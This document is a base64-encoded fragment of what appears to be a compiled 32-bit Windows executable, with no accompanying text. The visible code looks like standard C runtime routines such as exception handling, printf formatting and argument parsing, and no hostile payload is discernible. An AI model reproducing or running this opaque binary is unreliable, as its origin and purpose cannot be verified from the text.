+zMxkoQAAAABVi+xq/2hI4UAAaLSJQABQZIklAAAAAIPsIFNWV4tdGIt1DIll6Ild5I1G/IlF4IsI +iU3U6PH0//+LSGyJTdjo5vT//4tIcIlN3Ojb9P//i00IiUhs6ND0//+LTRCJSHDHRfwBAAAAi0Ug +UItFHFBTi0UUUFboUOD//4PEFIlF5MdF/P/////oOwAAAItF5ItN8F9kiQ0AAAAAXluL5V3Di0Xs +UOhxAAAAg8QEw4tl6DP2iXXkav+NRfBQ6Dji//+DxAiLxuvIi0XUi03giQHoVvT//4tN2IlIbOhL +9P//i03ciUhwi0UIgThjc23gdSeDeBADdSGBeBQgBZMZdRiDfeQAdBLoVuL//1CLRQhQ6DYCAACD +xAjDzMyLRCQEiwCBOGNzbeB1G4N4EAN1FYF4FCAFkxl1DIN4HAB1BrgBAAAAwzPAw8zMzMxkoQAA +AABVi+xq/2hg4UAAaLSJQABQi1UQZIklAAAAAItCBIPsCIXAU1ZXiWXoD4S6AQAAgHgIAA+EsAEA +AItKCIXJD4SlAQAAi0UMjXQBDMdF/AAAAAD2Agh0SItdCGoBi0MYUOjmKgAAg8QIhcAPhF0BAABq +AVbo8yoAAIPECIXAD4RKAQAAi0MYiQaLfRSDxwhXUOjmAQAAg8QIiQbpQwEAAIt9FPYHAXRli10I +agGLQxhQ6JYqAACDxAiFwA+EDQEAAGoBVuijKgAAg8QIhcAPhPoAAACLRxRQi0MYUFbomi8AAIPE +DIN/FAQPhfQAAACLBoXAD4TqAAAAg8cIV1DoeQEAAIPECIkG6dYAAACDfxgAi10IagGLQxhQdUbo +KyoAAIPECIXAD4SiAAAAagFW6DgqAACDxAiFwA+EjwAAAItHFFCDxwhXi0MYUOgsAQAAg8QIUFbo +Ii8AAIPEDOmBAAAA6OUpAACDxAiFwHRgagFW6PYpAACDxAiFwHRRi0cYUOgGKgAAg8QEhcB0QfYH +BHQfagGNRwhQi0MYUOjbAAAAg8QIUItHGFBW6B3d///rMo1HCFCLQxhQ6L4AAACDxAhQi0cYUFbo +8Nz//+sV6FkqAADrDrgBAAAAw4tl6OjJKQAAx0X8/////4tF8F9kowAAAABeW4vlXcPMzGShAAAA +AFWL7Gr/aHDhQABotIlAAFCLTQhkiSUAAAAAg+wIhclTVleJZeh0NItBHItABIXAdCrHRfwAAAAA +UItBGFDoaNz//+sQgH0MARvAQMOLZejoVikAAMdF/P////+LRfBfZKMAAAAAXluL5V3DzMzMzMzM +zMzMzMzMzMzMi1QkCFaLTCQIiwIDwYtyBIX2fAuLDDGLUggDBBEDxl7DzMzMzMzMzMzMzMzMzMzM +VYvsg+wEU1GLRQyDwAyJRfyLRQhV/3UQi00Qi2386Gbf////0IvdXYtNEFWL64H5AAEAAHUFuQIA +AABR6Ejf//9dWVvJwgwAzMzMzMzMzMxWV4t0JAw5NeAOQQB2TIvGi86D4OeD4R/B+APB4QKLkOAN +QQCNBMn2RAIEAXQsVuisLAAAi0QkGItMJBSDxARQUVboOQAAAIPEDIv4Vuj+LAAAg8QEi8dfXsPo +4dj//8cACQAAAOjm2P//X8cAAAAAALj/////XsPMzMzMzMzMzFZXi3QkDFboBCwAAIPEBIP4/3UT +6KfY//9fxwAJAAAAuP////9ew4tMJBSLVCQQUWoAUlD/FXwhQQCD+P+L+LgAAAAAdQb/FTQhQQCF +wHQRUOjq1///g8QEuP////9fXsOLxoPmH8HmAoPg58H4A4uI4A1BAI0E9oBkAQT9i8dfXsPMzMzM +zMzMzMzMzMzMzFaLdCQIVug1AAAAg8QEhcB0B7j/////XsP2Rg1AdBmLRhBQ6JgtAACDxASD+AG4 +AAAAAF6D0P/DM8Bew8zMzMxTVot0JAxXM/+LRgyLyIDhA4D5AnU8qQgBAAB0NYtGCIseK9iF234q +U1CLRhBQ6P0tAACDxAw7w3UPi0YMqIB0EYPg/YlGDOsJg04MIL//////i0YIiQaLx8dGBAAAAABf +XlvDzMzMzMzMzMzMzMzMagHoCQAAAIPEBMPMzMzMzIPsBFNWVzPbVTP/iVwkEGoC6Grs//+DxAQ5 +HRAfQQAPjoUAAAAz7Yt0JBihAA9BAIsEKIXAdGX2QAyDdF9QV+gM7f//g8QIoQAPQQCLDCiLQQyo +g3Q0g/4BdRFR6N/+//+DxASD+P90IUPrHoX2dRqoAnQWUejG/v//g8QEg/j/dQjHRCQQ/////6EA +D0EAiwwoUVfoJ+3//4PECIPFBEc7PRAfQQB8g+sEi3QkGGoC6Dvs//+DxASLw4P+AXQEi0QkEF1f +XluDxATDzMzMzMyD7AxTVot0JBhXVYtGEIN+BACJRCQQfQfHRgQAAAAAi0QkEGoBagBQ6DP9//+D +xAyL+IX/fQ24/////11fXluDxAzDi14M98MIAQAAdQ0rfgRdi8dfXluDxAzDixaLTgiLwivBiUQk +FIlEJBj2wwN0R4tEJBCLbCQQg+Dng+UfwfgDweUCi4DgDUEAjWztAPZEKASAdBI7ynMOgDkKdQT/ +RCQYQTvKcvKF/3Upi0QkGF1fXluDxAzD9sOAdevo3tX//13HABYAAAC4/////19eW4PEDMP2wwEP +hLYAAACLRgSFwHUNx0QkGAAAAADpogAAAItsJBSNHCiLRCQQg+DnwfgDBeANQQCJRCQUi0QkEIPg +H4tMJBTB4AKNLMCLAfZEKASAdGyLRCQQagJqAFDoLPz//4PEDDvHdR2LRgiNDBg7yHYLgDgKdQFD +QDvId/X2Rg0gdDzrOYtEJBBqAFdQ6Pv7//+DxAyB+wACAAB3EYtGDKgIdAr2xAS7AAIAAHQDi14Y +i0QkFIsI9kQpBAR0AUMr+4tEJBhdA8dfXluDxAzDzMzMzMzMzMzMzMzMzMxWV4t0JAw5NeAOQQB2 +QovGi86D4OeD4R/B+APB4QKLkOANQQCNBMn2RAIEAXQiVuhcKAAAg8QEVugzAAAAg8QEi/hW6Lgo +AACDxASLx19ew+ib1P//xwAJAAAA6KDU//9fxwAAAAAAuP////9ew8zMVleLdCQMg/4BdAWD/gJ1 +GmoC6LknAACDxASL+GoB6K0nAACDxAQ7+HQeVuigJwAAg8QEUP8VgCFBAIXAdQr/FTQhQQCL+OsC +M/9W6OAmAACDxASF/3QRV+ij0///g8QEuP////9fXsOLxoPmH8HmAoPg58H4A1+LiOANQQCNBPZe +xkQBBAAzwMPMzMzMzMzMVot0JAiLRgyog3QrqAh0J4tGCFDol9L//4PEBMcGAAAAAIFmDPf7///H +RggAAAAAx0YEAAAAAF7DzMzMzMzMzIPsBItMJAxTVjPbD74BV1Uz/4P4YXQUg/hydBaD+Hd0HjPA +XV9eW4PEBMO6CQEAAOsSM9KLNbAAQQCDzgHrDroBAwAAizWwAEEAg84CvQEAAAADzYA5AA+E8QAA +AIXtD4TpAAAAD74Bg+grg/hJdx3HRCQQAAAAAIqAtGxAAIhEJBCLRCQQ/ySFjGxAADPt6bAAAAD2 +wgJ0BzPt6aQAAACDygKBzoAAAACD4v6D5vzpkAAAAPbCQHQHM+3phAAAAIPKQOt/hdt0BDPt63e7 +AQAAAIPKEOtthdt0BDPt62W7AQAAAIPKIOtb9sYQdAQz7etSgcoAEAAA60r2xsB0BDPt60GBygCA +AADrOYX/dAQz7esxvwEAAACBzgBAAADrJIX/dAQz7escvwEAAACB5v+////rD/bGwHQEM+3rBoHK +AEAAAEGAOQAPhQ////+LRCQgaKQBAACLTCQcUFJR6A0rAACDxBCL0IXSfQozwF1fXluDxATDi0Qk +JDPJ/wVQ+EAAXV+JcAxeiUgEW4kIiUgIiUgciVAQg8QEw5CEa0AApGtAALVrQADHa0AA2WtAAOpr +QAD7a0AAEGxAACVsQAB9a0AAAAkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQEJCQkJCQkJCQkJCQkJ +AgMECQkJCQkJCQkJCQkJCQUGCQkJCQkJCQkJCQcJCQkJCQjMzFNWVzP2VTP/agLooeb//4PEBDk9 +EB9BAA+OlwAAADPbvYMAAAChAA9BAIsEGIXAdD6FaAx1IVBW6EPn//+DxAihAA9BAIsEGIVoDHQY +UFbonOf//4PECIPDBEY5NRAfQQB/wutQoQAPQQCLPLDrRmo46NrS//+DxASLDQAPQQCJBLGLDQAP +QQCLBLGFwHQmg8AgUP8VUCFBAIsNAA9BAIsEsYPAIFD/FVghQQCLDQAPQQCLPLEzwIX/dBWJRwSJ +RwyJRwiJB4lHHMdHEP////9qAuhJ5v//g8QEi8ddX15bw8zMzMzMzMzMzMzMzMzMzDPAw8zMzMzM +zMzMzMzMzMyLTCQEi8GL0IPAAmaDOgB19SvBwfgBSMPMzMzMzMzMzFZXi3QkDItGEFDo8T0AAIPE +BIXAdQUzwF9ew4H+8PVAAHUEM8DrDYH+EPZAAHVeuAEAAAD/BVD4QAD3RgwMAQAAdAUzwF9ew408 +hSj7QACDPwB1GGgAEAAA6NLR//+DxASJB4XAdQUzwF9ew4sHiUYIX4kGuAAQAACJRhiJRgS4AQAA +AIFODAIRAABewzPAX17DzMzMzMzMzMzMzMzMzMyDfCQEAFZ0Lot0JAz2Rg0QdCRW6Nj3//+BZgz/ +7v//x0YYAAAAAIPEBMcGAAAAAMdGCAAAAABew8zMzMzMzMzMgexIAgAAi4QkUAIAAFP/hCRUAgAA +VsdEJCAAAAAAV4oYVYTbx0QkQAAAAAAPhCUCAACLdCRYi3wkWIN8JCgAD4wSAgAAgPsgfBWA+3h/ +EA++yzPAioG44UAAg+AP6wIzwItMJECKhMHY4UAAwPgED77Ig/kHi8GJTCRAD4e+AQAA/ySF0HdA +AMdEJEwAAAAAx0QkSAAAAADHRCQ0AAAAAMdEJDgAAAAAx0QkHP////8z9ol0JDzphAEAAA++w4Po +IIP4EA+HdQEAADPJiogIeEAA/ySN8HdAAIPOAuleAQAAgc6AAAAA6VMBAACDzgHpSwEAAIPOBOlD +AQAAg84I6TsBAACA+yp1Ko2EJGQCAABQ6JoJAACJRCQ4g8QEhcAPjRoBAAD32IPOBIlEJDTpDAEA +AItEJDQPvsuNFICNTFHQiUwkNOn1AAAAx0QkHAAAAADp6AAAAID7KnUpjYQkZAIAAFDoRwkAAIlE +JCCDxASFwA+NxwAAAMdEJBz/////6boAAACLRCQcD77LjRSAjUxR0IlMJBzpowAAAA++y4PpSYP5 +Lg+HlAAAADPAioEweEAA/ySFHHhAAIuEJGACAACAODZ1FoB4ATR1EIOEJGACAAACgc4AgAAA62PH +RCRAAAAAADPAiw1g+0AAisPHRCQ8AAAAAPZEQQGAdCmNRCQoi4wkXAIAAA++01BRUujNBwAAi4wk +bAIAAIPEDIoZ/4QkYAIAAI1EJCiLjCRcAgAAD77TUFFS6KQHAACDxAyLhCRgAgAA/4QkYAIAAIoY +hNsPheP9//+LRCQoXV9eW4HESAIAAMODziDr1IPOEOvPgc4ACAAA68cPvsuD6UOD+TUPh+0EAAAz +wIqBpHhAAP8khWB4QAD3xjAIAAB1BoHOAAgAAPfGEAgAAI2EJGQCAABQD4R1BAAA6CMIAACDxARQ +jUQkXFDohToAAIPECIv4hf8PjWYEAADHRCRIAQAAAOlZBAAAx0QkTAEAAACAwyCDzkCNRCRYg3wk +HACJRCQYD414AwAAx0QkHAYAAADpegMAAPfGMAgAAHUGgc4ACAAAg3wkHP+7////f3QEi1wkHI2E +JGQCAABQ6HIHAACJRCQcg8QE98YQCAAAD4T3AwAAhcB1CaE0+0AAiUQkGItsJBgz/8dEJDwBAAAA +hdsPjgAEAABmi0UAZoXAD4TzAwAAUI1EJBRQ6MQ5AACDxAiFwA+E3QMAAAP4g8UCO/t81OnPAwAA +jYQkZAIAAFDo/gYAAIPEBIXAdDqLSASFyXQz98YACAAAdBfHRCQ8AQAAAA+/OMHvAYlMJBjplQMA +AMdEJDwAAAAAD784iUwkGOmBAwAAoTD7QAC5/////4v4iUQkGCvA8q730Y15/+ljAwAAg85AvwoA +AADreY2EJGQCAABQ6IgGAACLTCQsg8QE98YgAAAAdAVmiQjrAokIx0QkSAEAAADpKQMAAPfGgAAA +AL8IAAAAdDyBzgACAADrNMdEJBwIAAAAx0QkRAcAAAD3xoAAAAC/EAAAAHQXxkQkEjDHRCQ4AgAA +AItEJEQEUYhEJBP3xgCAAAB0Lo2EJGQCAABQ6BcGAACJRCQkiVQkKIPEBOmDAAAAvwoAAADr1MdE +JEQnAAAA66b3xiAAAAB0M/fGQAAAAI2EJGQCAABQdBboyQUAAA+/wIlEJCSDxASZiVQkJOtE6LMF +AAAPt8CDxATrK/fGQAAAAI2EJGQCAABQdBPolgUAAIlEJCSDxASZiVQkJOsU6IMFAACDxASJRCQg +x0QkJAAAAAD3xkAAAAB0L4N8JCQAfyh8B4N8JCAAcx+LRCQgi0wkJPfYg9EAiUQkLPfZgc4AAQAA +iUwkMOsQi0QkIItMJCSJRCQsiUwkMPfGAIAAAHUKg2QkLP+DZCQwAIN8JBwAfQrHRCQcAQAAAOsD +g+b3g3wkMAB1D4N8JCwAdQjHRCQ4AAAAAI2EJFcCAACJRCQYi0QkHP9MJByFwH8Og3wkMAB1B4N8 +JCwAdF2JfCQgi8eZi0QkLItMJDCJVCQki1QkIItcJCRTUlFQ6Lg4AACNWDCLTCQwi0QkLItUJCCL +bCQkVVJRUOgsOAAAiUQkLIP7OYlUJDB+BANcJESLRCQY/0wkGIgY64mNvCRXAgAAK3wkGP9EJBj3 +xgACAAAPhBgBAACLRCQYgDgwdQiF/w+FBwEAAEf/TCQYi0QkGMYAMOn2AAAAdQ2A+2d1CMdEJBwB +AAAAg4QkZAIAAAiLhCRkAgAAi0j4i1D8g+gIiUwkUItEJEyLTCQciVQkVFCNRCRcUQ++041MJFhS +UIv+Uf8V8AhBAIPEFIHngAAAAHQVg3wkHAB1Do1EJFhQ/xX8CEEAg8QEgPtndRKF/3UOjUQkWFD/ +FfQIQQCDxASAfCRYLXUOgc4AAQAAjUQkWYlEJBiLfCQYuf////8rwPKu99GNef/rR78BAAAA6HkD +AACIRCRcg8QEjUQkWIlEJBjrLIN8JBgAdQmhMPtAAIlEJBiLfCQYi8NLhcB0DYA/AHQIR4vDS4XA +dfMrfCQYg3wkSAAPhcD6///3xkAAAAB0M/fGAAEAAHQHxkQkEi3rHPfGAQAAAHQHxkQkEivrDffG +AgAAAHQNxkQkEiDHRCQ4AQAAAItEJDQrxytEJDj3xgwAAACJRCQgdRyNRCQoi4wkXAIAAItUJCBQ +UVJqIOhHAgAAg8QQjUQkKIuMJFwCAACLVCQ4UI1EJBZRUlDoaAIAAIPEEPfGCAAAAHQk98YEAAAA +dRyNRCQoi4wkXAIAAItUJCBQUVJqMOj8AQAAg8QQg3wkPAB0SYX/fkWLXCQYjW//i8ONTCQUZosA +g8MCUFHo9DQAAIPECIXAfj+NTCQoi5QkXAIAAFFSUI1EJCBQ6PUBAACDxBCLzU2FyXXE6xuNRCQo +i4wkXAIAAItUJBhQUVdS6NEBAACDxBD3xgQAAAAPhJH5//+NRCQoi4wkXAIAAItUJCBQUVJqIOhp +AQAAg8QQ6XD5//+Q5HBAAIhvQAC7b0AABHBAAEpwQABXcEAAnHBAAHhxQADZb0AA4W9AAOxvQAD0 +b0AA/G9AAD9xQAAABQUBBQUFBQUFBQIFAwUFBI1JALpwQABmcUAAa3FAAHBxQAA/cUAAAAQEBAQE +BAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAEEBAQCBAQEBAQEBAQEBAOQlnFAAOVxQADlcUAAE3JA +AGhzQAClckAApHFAABFzQADwcUAAEXNAABtzQABLc0AAYHNAACFyQAC5c0AAwHNAAHR2QAAAEAEQ +AhAQEBAQEBAQEBAQAxAQEBAEEAUQEBAQEBAQEAYHCAgIEAkQEBAQCgsMEBANEA4QEA/MzMzMzMyL +VCQIi0IESIlCBHgTiwKKTCQEiAiLCjPAigFBiQrrDotMJARSUejFBQAAg8QIg/j/i0QkDHUHxwD/ +////w/8Aw8zMzMzMzMzMzMzMzMzMzFNWi3QkDFeLfCQUVYtcJByLbCQgi8dPhcB+EVVTVuiN//// +g8QMg30A/3XoXV9eW8PMzMzMzMzMzMzMzMzMzMxTVot0JAxXi3wkFFWLXCQci2wkIIvHT4XAfheL +xlVGUw++CFHoR////4PEDIN9AP914l1fXlvDzMzMzMzMzMzMi0QkBIsIg8EEiQiLQfzDzItEJASL +CIPBCIkIi0H4i1H8g+kIw8zMzMzMzMzMzMzMi0QkBIsIg8EEiQhmi0H8w4PsRFNWV1VogAQAAOhP +xv//g8QEi/CF9nUKahvoH9n//4PEBI2GgAQAAIk14A1BAMcF4A5BACAAAAA7xnYoM8m6CgAAAIhO +BIPGJMdG3P////+IVuGJTuSh4A1BAAWABAAAO8Z3341EJBBQ/xWQIUEAZoN8JEIAD4TUAAAAg3wk +RAAPhMkAAACLRCREiyiNeASB/QAIAACNHC98Bb0ACAAAOy3gDkEAfl6+5A1BAGiABAAA6KjF//+D +xASFwHRCjYiABAAAiQaDBeAOQQAgO8h2IjPJiEgEg8Akx0Dc/////8ZA4QqJSOSLFoHCgAQAADvQ +d+CDxgQ7LeAOQQB/r+sGiy3gDkEAM/aF7X5EiwOD+P90NPYHAXQvUP8ViCFBAIXAdCSLxovOg+Dn +g+EfwfgDweECi5DgDUEAiwONDMkDyokBiheIUQRGR4PDBDvuf7wz9jP/ix3gDUEAA96DO/91V7j2 +////hfbGQwSBdA6NR/+D+AG49f///4PQ/1D/FYwhQQCD+P+L6HQoVf8ViCFBAIXAdB0l/wAAAIkr +g/gCdQaASwRA6xWD+AN1EIBLBAjrCoBLBEDrBIBLBICDxiRHg/5sfI+h4A5BAFD/FYQhQQBdX15b +g8REw8zMzMzMzFZXi3wkEA+vfCQMhf91Bb8BAAAAoewOQQCLNSghQQCD/+B2BDPA6wZXaghQ/9aF +wHUdgz2E+UAAAHQUV+hP3v//g8QEhcCh7A5BAHXSM8BfXsPMzMzMzMzMzMzMzMzMzFNWVzPbVWoC +vQMAAADobtf//4PEBDktEB9BAH5qvgwAAACLPVQhQQChAA9BAIsEMIXAdEf2QAyDdA9Q6DDL//+D +xASD+P90AUOD/lB8LaEAD0EAiwQwg8AgUP/Xiw0AD0EAixQxUujFwP//g8QEiw0AD0EAxwQxAAAA +AIPGBEU5LRAfQQB/oWoC6GLX//+DxASLw11fXlvDzMzMzMzMzMyDPQj7QAAAVld1FItEJAyD+GF8 +V4P4en9Sg+ggX17Dgz3kDkEAAHQRahO+AQAAAOis1v//g8QE6wgz9v8F6A5BAItEJAxQ6CUAAACD +xASL+IX2dA9qE+j11v//g8QEi8dfXsOLx/8N6A5BAF9ew8zMg+wIgz0I+0AAAFOLXCQQdRSD+2F8 +CIP7en8Dg+sgi8Nbg8QIw4H7AAEAAH0wgz0c+0AAAX4NagJT6LIAAACDxAjrD4sNYPtAADPAZosE +WYPgAoXAdQeLw1uDxAjDis8z0orRoWD7QAD2RFABgHQUuAIAAACITCQIxkQkCgCIXCQJ6w64AQAA +AIhcJAjGRCQJAI1MJARqAGoDixUI+0AAUVCNRCQYUGgAAgAAUuhPMAAAg8QchcB1B4vDW4PECMOD ++AF1CzPAikQkBFuDxAjDM8AzyYpEJAWKTCQEweAIWwvBg8QIw8zMzMzMzMzMzMzMi0wkBIPsCFON +QQE9AAEAAHcVixVg+0AAM8BmiwRKI0QkFFuDxAjDitUz24raoWD7QAD2RFgBgHQUuAIAAACIVCQI +xkQkCgCITCQJ6w64AQAAAIhMJAjGRCQJAI1MJAZqAGoAUVCNRCQYUGoB6L8zAACDxBiFwHUHM8Bb +g8QIw4tEJAYl//8AACNEJBRbg8QIw8zMzMzMzMzMzMzMzMzMzFNWi3QkEFdVi34Qi0YMqIIPhCcB +AACoQA+FHwEAAKgBdBvHRgQAAAAAi0YMqBAPhIAAAACLRgiJBoNmDP6LRgwz7YPIAolGDIPg74lG +DMdGBAAAAAD3RgwMAQAAdSaB/vD1QAB0CIH+EPZAAHUNV+jcLAAAg8QEhcB1CVbovw8AAIPEBPdG +DAgBAAB0eotGCIseK9hAiQaLRhhIhduJRgR+IlOLRghQV+hjFQAAg8QMi+jrSIPIIF1fiUYMuP// +//9eW8O4OPtAAIP//3Qbi8eLz4Pg54PhH8H4A8HhAouA4A1BAI0UyQPC9kAEIHQNagJqAFfol+X/ +/4PEDIpEJBSLTgiIAesWuwEAAACNRCQUU1BX6PgUAACDxAyL6DvrdA64/////12DTgwgX15bw4tE +JBRdJf8AAABfXlvDg8ggXV+JRgy4/////15bw8zMzFNWV1XoF9b//4vwi0wkFItGUFBR6DcBAACD +xAiFwA+EGwEAAItQCIXSD4QQAQAAg/oFdRHHQAgAAAAAuAEAAABdX15bw4P6AXUKuP////9dX15b +w4t+VItMJBiJTlSDeAQID4W6AAAAix3o/UAAiw3s/UAAA8s7y34ljQxbweECi25Qg8EMQ8dEDfwA +AAAAiy3s/UAAAy3o/UAAO+t/4YteWIsAPY4AAMB1CcdGWIMAAADrXj2QAADAdQnHRliBAAAA6049 +kQAAwHUJx0ZYhAAAAOs+PZMAAMB1CcdGWIUAAADrLj2NAADAdQnHRliCAAAA6x49jwAAwHUJx0ZY +hgAAAOsOPZIAAMB1B8dGWIoAAACLRlhQagj/0oPECIleWOsQx0AIAAAAAItABFD/0oPEBLj///// +XYl+VF9eW8OLTCQYUf8VGCFBAF1fXlvDzItEJAhWi/CLVCQIORZ0E4PGDIsN9P1AAI0MSY0MiDvO +d+mLBivCg/gBG8Ajxl7DzIPsBDPSU1ZXizWk+EAAVYvGOBZ0GoA+PXQBQov+uf////8rwPKu99ED +8YA+AHXmjQSVBAAAAFDodL7//6OA+EAAg8QEi9iF23UKagnoP9H//4PEBIstpPhAAIvFgH0AAHRe +i/25/////yvA8q730YlMJBCAfQA9dD1R6DG+//+DxASJA4XAdQpqCegB0f//g8QEi/25/////yvA +8q730Sv5i8HB6QKL94s7g8ME86WLyIPhA/OkA2wkEIB9AAB1oqGk+EAAUOj1uv//g8QExwMAAAAA +XV9eW4PEBMPMzMzMg+wIVldoBAEAAL4YDEEAVmoA/xWYIUEAofAOQQCJNZD4QACAOAB0Bos18A5B +AI1EJAyNTCQIUFFqAGoAVuheAAAAi0QkHIPEFMHgAgNEJAxQ6Hq9//+DxASL+IX/dQpqCOhK0P// +g8QEjUQkDI1MJAiLVCQIUFGNBJdQV1boHgAAAItEJByDxBRIiT14+EAAX6N0+EAAXoPECMPMzMzM +zItEJBRTi1QkFFaLTCQMV4t8JBhVg3wkGADHAAAAAADHAgEAAAB0C4tUJBiDRCQYBIk6gDkidEb/ +AIX/dAWKEYgXR4oRQTPbitr2gwH+QAAEdAz/AIX/dAWKGYgfR0GA+iB0CYTSdAmA+gl1y4TSdQNJ +61CF/3RMxkf/AOtGQYA5InQwihmE23QqM9KK0/aCAf5AAAR0DP8Ahf90BooRQYgXR/8Ahf90BYoR +iBdHQYA5InXQ/wCF/3QExgcAR4A5InUBQTP2gDkAD4TmAAAAihGA+iB0BYD6CXUDQevxgDkAD4TO +AAAAg3wkGAB0C4tUJBiDRCQYBIk6i1QkIP8CuwEAAAAz0oA5XHUHQUKAOVx0+YA5InUi9sIBdRqF +9nQNjWkBgH0AInUEi83rAjPbg/4BG/b33sHqAYvqSoXtdBGF/3QExgdcR4vq/wBKhe1174oRhNJ0 +T4X2dQqA+iB0RoD6CXRBhdt0N4X/dCEz24ra9oMB/kAABHQGiBdBR/8AihFHQYhX//8A6XH///8z +24ra9oMB/kAABHQDQf8A/wBB6Vn///+F/3QExgcAR/8A6RH///+DfCQYAHQKi1QkGMcCAAAAAItU +JCBdX15b/wLDg+wEgz38/UAAAFNWV4s1rCFBAFV1Ov/Wi/iF/3QQxwX8/UAAAQAAAItcJBDrKv8V +pCFBAIvYhdt0DMcF/P1AAAIAAADrEjPAXV9eW4PEBMOLXCQQi3wkEIM9/P1AAAEPhaIAAACF/3US +/9aL+IX/dQozwF1fXluDxATDZoM/AIv3dBKDxgJmgz4AdfeDxgJmgz4Ade4r92oAwf4BagBGagBq +AFZXagBqAP8VMCFBAIvohe10QVXopbr//4PEBIvYhdt0MmoAagBVU1ZXagBqAP8VMCFBAIXAdQtT +6JC3//+DxAQz21f/FaghQQCLw11fXluDxATDV/8VqCFBADPAXV9eW4PEBMODPfz9QAACdXuF23UW +/xWkIUEAi9iF23UKM8BdX15bg8QEw4vrgDsAdA5FgH0AAHX5RYB9AAB18ivrRVXoGLr//4lEJBSD +xASFwHURU/8VnCFBADPAXV9eW4PEBMOLfCQQi/OLzcHpAvOli81Tg+ED86T/FZwhQQCLRCQQXV9e +W4PEBMMzwF1fXluDxATDzMzMzMzMzMzMzMyD7BhTVldVahnoEs3//4tEJDCDxARQ6BUCAACDxASL +6DktBP9AAHUUahnoYc3//4PEBDPAXV9eW4PEGMOF7XUZ6JsCAABqGehEzf//g8QEM8BdX15bg8QY +w8dEJBAAAAAAuCj/QAA5KA+EmwAAAIPAMP9EJBA9GABBAHLqjUQkFFBV/xWwIUEAg/gBD4VZAQAA +vwD+QAAzwLlAAAAA86uqg3wkFAEPhhABAACNdCQaOEQkGnQsik4BhMl0JTPAM9KKBorRO9ByEYCI +Af5AAARAM8mKTgE7yHPvg8YCgD4AddS4AQAAAICIAf5AAAhAPf8AAABy8VWJLQT/QADofwEAAIPE +BOm5AAAAvwD+QAAzwLlAAAAA86uqi0wkEI0USY08VQAAAACNDAeNNM04/0AAgD4AdDGKTgGEyXQq +M9Iz24oWitk72nIWiogg/0AACIoB/kAAQjPbil4BO9pz8IPGAoA+AHXPQIP4BHK6VYktBP9AAOgI +AQAAg8QEuhD/QACjCP9AAItEJBDB4ASLnEAw/0AAahmNjEAs/0AAiwGLSQiJAolaBIlKCOjiy/// +g8QEM8BdX15bg8QYwzPAowT/QAC5EP9AAGoZowj/QAAzwIkBiUEEiUEI6LPL//+DxAQzwF1fXluD +xBjDgz0c/0AAAHQZ6OgAAABqGeiRy///g8QEM8BdX15bg8QYw2oZ6H3L//+DxAS4/////11fXluD +xBjDzMzMzMzMzMzMzMzMzMcFHP9AAAAAAACLRCQEg/j+dRDHBRz/QAABAAAA/yW4IUEAg/j9dRDH +BRz/QAABAAAA/yW0IUEAg/j8dQ/HBRz/QAABAAAAoRj7QADDzMzMi0QkBC2kAwAAg/gSdw8zyYqI +XIlAAP8kjUiJQAAzwMO4EQQAAMO4BAgAAMO4EgQAAMO4BAQAAMMwiUAANolAADyJQABCiUAALYlA +AAAEBAQBBAQEBAQEBAQEBAQEAgPMVzPAvwD+QAC5QAAAAPOrqqMQ/0AAuRD/QABfowT/QACjCP9A +AIlBBIlBCMPMzMzMav3o6fz//4PEBMPMVkMyMFhDMDBVi+yD7AhTVldV/ItdDItFCPdABAYAAAAP +hYIAAACJRfiLRRCJRfyNRfiJQ/yLcwyLewiD/v90YY0MdoN8jwQAdEVWVY1rEP9UjwRdXotdDAvA +dDN4PIt7CFPoubn//4PEBI1rEFZT6O65//+DxAiNDHZqAYtEjwjocbr//4sEj4lDDP9UjwiLewiN +DHaLNI/robgAAAAA6xy4AQAAAOsVVY1rEGr/U+iuuf//g8QIXbgBAAAAXV9eW4vlXcNVi0wkCIsp +i0EcUItBGFDoibn//4PECF3CBADMzMzMobD4QACD+AF0DYXAdS6DPbT4QAABdSVo/AAAAOgfAAAA +g8QEoaAAQQCFwHQC/9Bo/wAAAOgHAAAAg8QEw8zMzIHsqAEAADPJuBgAQQBTi5QksAEAAFZXVTkQ +dAuDwAhBPaAAQQBy8TkUzRgAQQCNHM0AAAAAD4WnAQAAgz2w+EAAAQ+EXwEAAIM9sPhAAAB1DYM9 +tPhAAAEPhEkBAACB+vwAAAAPhHgBAACNhCS0AAAAaAQBAABQiy2YIUEAagD/1YXAdRa+5ORAAI28 +JLQAAAC5BQAAAPOlZqWkjawktAAAAI28JLQAAAC5/////yvA8q730YP5PHYmjbwktAAAALn///// +K8BqA/Ku99GNbAx8aODkQABV6PS6//+DxAy+xORAAI18JBS5BgAAAPOlZqWL/bn/////K8DyrvfR +K/mL0Yv3uf////+NfCQUK8Dyrk+LysHpAvOli8qD4QPzpL/A5EAAuf////8rwPKu99Er+YvRi/e5 +/////418JBQrwPKuT4vKwekC86WLyoPhA/Oki7scAEEAuf////8rwPKu99Er+Yv3i9GNfCQUuf// +//8rwPKuT4vKwekC86WLymgQIAEAg+EDaJjkQADzpI1EJBxQ6CcnAACDxAxdX15bgcSoAQAAw6Hg +DUEAi3BIg/7/dQpq9P8VjCFBAIvwi5McAEEAagCNRCQUi/pQuf////8rwPKu99FJUVJW/xW8IUEA +XV9eW4HEqAEAAMPMzMxW6PrE//+h+A5BAFDozycAAIPEBIsN9A5BACsN+A5BAIPBBDvBc0qh+A5B +AFDoricAAIPEBIPAEIsN+A5BAFBR6CsnAACDxAiFwHUJ6L/E//8zwF7Diw30DkEAKw34DkEAg+H8 +o/gOQQADyIkN9A5BAKH0DkEAi3QkCIkwgwX0DkEABOiIxP//i8Zew8zMzMyLRCQEUOhm////g8QE +g/gBG8DDzMzMzMzMzMzMzMzMzGiAAAAA6Nay//+DxASj+A5BAIXAdQpqGOijxf//g8QEofgOQQDH +AAAAAACh+A5BAKP0DkEAw8zMzMzMzMzMzMyLRCQIVr4BAAAAUItMJAxR/xXAIUEAhcB0AjP2i8Ze +w4tEJAhWvgEAAABQi0wkDFH/FcQhQQCFwHQCM/aLxl7Di0QkBFa+AQAAAFD/FcghQQCFwHQCM/aL +xl7DzMzMzMxkoQAAAABVi+xq/2gA5UAAaLSJQABQZIklAAAAAIPsCFNWV4ll6MdF/AAAAADo/sf/ +/4N4YAB0IcdF/AEAAADo7Mf///9QYOsJuAEAAADDi2Xox0X8AAAAAMdF/P/////oEAAAAItF8F9k +owAAAABeW4vlXcPpNiYAAMPMzMzMzGShAAAAAFWL7Gr/aBjlQABotIlAAFBkiSUAAAAAg+wIU1ZX 